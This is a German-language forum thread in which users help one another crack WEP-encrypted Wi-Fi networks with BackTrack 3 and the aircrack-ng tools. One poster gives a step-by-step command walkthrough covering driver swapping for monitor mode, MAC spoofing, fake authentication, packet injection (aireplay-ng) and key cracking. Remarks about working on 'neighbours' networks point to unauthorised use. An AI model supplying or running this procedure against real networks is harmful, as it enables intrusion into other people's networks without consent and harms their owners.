[PROB] BT 3 - IPW 3945ABG

[dbns]

hmjo kommt drauf an normalerweise brauch ich so ca ne halbe stunde, bei freundlichen netzen warens schon 5 minuten^^

[sam_semillia]

sodawasser, ich hab jetzt rebootet und alles neu gestartet.

hier ein screeny:


aber ich hätte noch kurz ein paar fragen dazu:

kismet: wozu genau brauch ich das??? ich hol mir die daten über das netz mit
airodump-ng wlan0


airodump-ng --ivs --channel 11 -w /root/collect wlan0
wozu brauch ich den befehl? sagt mir der dass er dort die pakete "sammelt" bzw die infos? weil den schließ ich ja auch gleich wieder, so wie du gesagt hast.

mfg samse

[maoshe]

@samse: du hattest ein kifferboard! - www.kiffers-paradise.de war die url.
samse alias colaweizen alias dominic

du musst es ja nicht abstreiten^^

[sam_semillia]

@samse: du hattest ein kifferboard! - www.kiffers-paradise.de war die url.
samse alias colaweizen alias dominic

du musst es ja nicht abstreiten^^

nöööööö das war ned ich, ich bin schon immer sam_semillia. samse schreib ich erst seit nem jahr oder 2 mit mfg weil, weis n ed warum, warscheinlichen wegen SAM_SEmillia ich wüsste wenn ich das board gehabt hätte, ehrlich

mfg samse


//edit: und colaweizen und dominic sagt mir auch gar nüx

[dbns]

airodump-ng --ivs --channel 11 -w /root/collect wlan0
das is der eigentliche 'recorder', den nich schliessen xD

ahja und statt kismet geht natuerlich auch airodump, das must du aber dann auch ausmachen beim capturen

und den aircrack erst am ende wenn du genug #data hast

[sam_semillia]

ahhh kk


so nochmal neu gestartet. dies 3 befehle werden jetzt ausgeführt:





also der /rooT collect
fakeauth
und arpreplay

stimmt das jetzt so????

ich krieg nämlich schon wieder keine acks....


mfg sam

[LudenJupp]

Nimm einfach den Ipwraw-Treiber, dann klappts auch mit den Nachbarn!

Kurzanleitung:

1. Gewünschtes Netzwerk raussuchen, MAC des APs notieren, Channel notieren mit:

Code:

airodump-ng wlan0

2. Ipwraw-Treiber laden:

Code:

modprobe -r iwl3945
modprobe ipwraw

Kein airmon oder sonstwas ausführen! Die Karte ist nun automatisch im Monitor-Mode!
Du hast nun 2 Devices: wifi0 und rtap0

3. wifi0 einstellen:

Code:

//wifi0 deaktivieren
ifconfig wifi0 down
//MAC des APs eingeben
nano /sys/class/net/wifi0/device/bssid
//Channel eingeben
nano /sys/class/net/wifi0/device/channel
//Rate auf 2 setzen
nano /sys/class/net/wifi0/device/rate
//Optional die MAC von wifi0 ändern (bietet sich an, weil schneller einzutippen)
macchanger -m 00:11:22:33:44:55 wifi0
//wifi0 aktivieren
ifconfig wifi0 up

4. Airodump-ng nur nach Daten aus dem gewünschten Netzwerk scannen lassen:

Code:

airodump-ng -c <channel> --bssid <AP MAC> -w out wifi0

5. Mit dem AP authentifizieren:

Code:

aireplay-ng -1 0 -a <AP MAC> -h <wifi0 MAC (00:11:22:...)> wifi0

6. Jetzt kann unterschieden werden ob ein Client zum AP verbunden ist. Dann ist eine andere Möglichkeit den AP zum aussenden von IVs zu bringen gegeben. Ich beziehe mich auf die Möglichkeit, die meistens und auch wenn kein Client verbunden ist, funktioniert. Falls diese Attacke nicht klappen sollte, informier dich auf der aircrack-ng Seite über die Fragmentation- und ChopChop-Attacke oder warte auf einen Client und machs so, wie du vor hattest.

Code:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <AP MAC> -h <wifi0 MAC> wifi0

7. Bei genügend Paketen aircrack-ng anwerfen.

Code:

aircrack-ng out-01.cap

(das -w Argument bei airodump-ng legt den Namen der Capture-Datei fest)

Wenn man sich nun zu dem Netzwerk verbinden will, werden allerdings die iwl3945-Treiber benötigt, also:

Code:

modprobe -r ipwraw
modprobe iwl3945

Somit hab ich wohl auch das Mini-Tutorial geschrieben... Falls ein Mod Lust dazu hat, kann er den Beitrag ja in die Tutorialfore verschieben. Wenn nicht, solls mir wurst sein.

Gruss

[sam_semillia]

@ludenjupp: danke, kanns leider heute nicht mehr porobieren. werds montag morgen gleich austesten und laufen lassen, mal schaun obs klappt. bin schon leicht am verzweifeln

werde mich montag wieder da melden, würd euch bitten kurz reinzusehen, obs gefunzt hat, wenn ned glaub ich eh dass ich schön langsam aufgeb

vielen dank an euch alle


aja und schönes verlängertes weekend


mfg samse

[GrafZeppelin]

airodump-ng --ivs --channel 11 -w /root/collect wlan0
das is der eigentliche 'recorder', den nich schliessen xD

ahja und statt kismet geht natuerlich auch airodump, das must du aber dann auch ausmachen beim capturen

und den aircrack erst am ende wenn du genug #data hast

wenn ich sowas lese bekomm ich ne kleine Kriese.

der Parameter --ivs ist schwachsinn und veraltet, er speichert dann NUR die IVS, das dauert dann zu lange.

ich guck gleich nochmal ob ich irgendwie besseren empfang hab dann dreh ich mal was, mit der stummel antenne reichts irgendwie nicht !

[maoshe]

@graf: wolltest du nicht mal ein tut machen, wei man mit bt3 alleine wep-verschlüsselte netzwerke knacken kann?